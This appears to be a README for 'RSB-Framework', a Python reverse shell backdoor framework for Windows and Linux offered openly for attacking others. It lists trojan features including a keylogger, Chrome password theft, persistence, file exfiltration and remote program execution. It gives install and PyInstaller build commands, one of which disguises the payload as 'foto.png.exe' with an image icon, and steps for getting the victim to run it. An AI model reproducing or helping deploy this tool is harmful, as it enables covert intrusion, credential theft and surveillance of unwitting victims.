RSB-Framework: Windows/Linux – Reverse Shell Backdoor Framework
Reverse Shell Backdoor is a framework to control infected machines
In this repository contains two programs. A backdoor and the user’s interface. the backdoor needs to be compiled sent to the victim and executed.
What’s a backdoor?
Backdoor is a computer virus popular known as a trojan horse. It work’s as a reverse shell to victim computer.
Backdoor features :
- Remote connection.
- Download files from the victim machine.
- Send files to the victim machine.
- Persistence.
- Screenshot of the victim screen.
- Execute other programs on the victim computer.
- Keylogger.
- Capture Google-chrome passwords.
- Geographic Location.
- Change victim’s computer background.
- Backdoor complete (Only when all features ready).
Installation
you need to install all the dependencies to run the backdoor and server.
git clone https://github.com/tarcisio-marinho/RSB-Framework.git
linux:
~$ sudo pip install -r requeriments.txt
windows:
pip install -r requeriments.txt
Compiling
Linux:
pyinstaller -F –clean -w backdoor.py -n backdoor
windows:
pyinstaller -F –clean -w backdoor.py -i icone.png -n foto.png.exe
How to use?
First, the victim should run the backdoor compiled on the computer. Then when the attacker runs the servidor.py, he shall get a reverse connection to the victim computer.
Victim:
python backdoor.py
Attacker:
python servidor.py
Uses
It can be used to control the victim computer with de reverse shell. Also, you can send and download files to the victim computer Get persistence -> Even if the victim shutdown the computer, the backdoor will continue working. Execute other programs or virus on the victim’s computer.